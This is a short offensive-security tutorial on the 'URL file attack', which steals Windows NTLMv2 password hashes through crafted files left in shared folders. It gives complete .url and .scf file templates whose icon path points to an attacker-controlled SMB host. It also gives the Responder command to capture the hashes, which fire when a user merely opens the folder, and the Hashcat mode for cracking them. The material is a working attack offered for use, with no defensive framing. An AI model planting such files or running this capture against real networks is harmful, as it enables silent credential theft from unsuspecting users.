What is a URL File Attack?

A URL file attack captures account hashes via a user accessing a folder that contains a specially crafted file that forces the user to request an icon off the attackers machine. The resource does not exist though. The act of initiating a connection to the attackers machine is how the hash is captured. Also note that the user does not need to open the file, nor is their any indication that anything has happened behind the scenes. They just need to open the folder that the file is located in which makes this a perfect for shared folders.

The File

The file name must begin with either a “@” symbol or a “~” symbol and the filetype must be “url”. Example: “@readme.url”

[InternetShortcut]
URL=http://google.com
WorkingDirectory=%username%
IconFile=\\192.168.1.240\%USERNAME%.icon
IconIndex=1

The same can be done with an scf file. Example: @readme.scf

[Shell]
Command=2
IconFile=\\192.168.1.240\Share\test.ico
[Taskbar]
Command=ToggleDesktop

Responder

Make sure HTTP and SMB is turned ON in responder. (default responder settings)

responder -I eth0 -rdwv

Capture the Hash

Whatever user opens the folder is the hash we will capture in responder. Note the NTLMv2 hash 🙂 Hashcat mode: 5600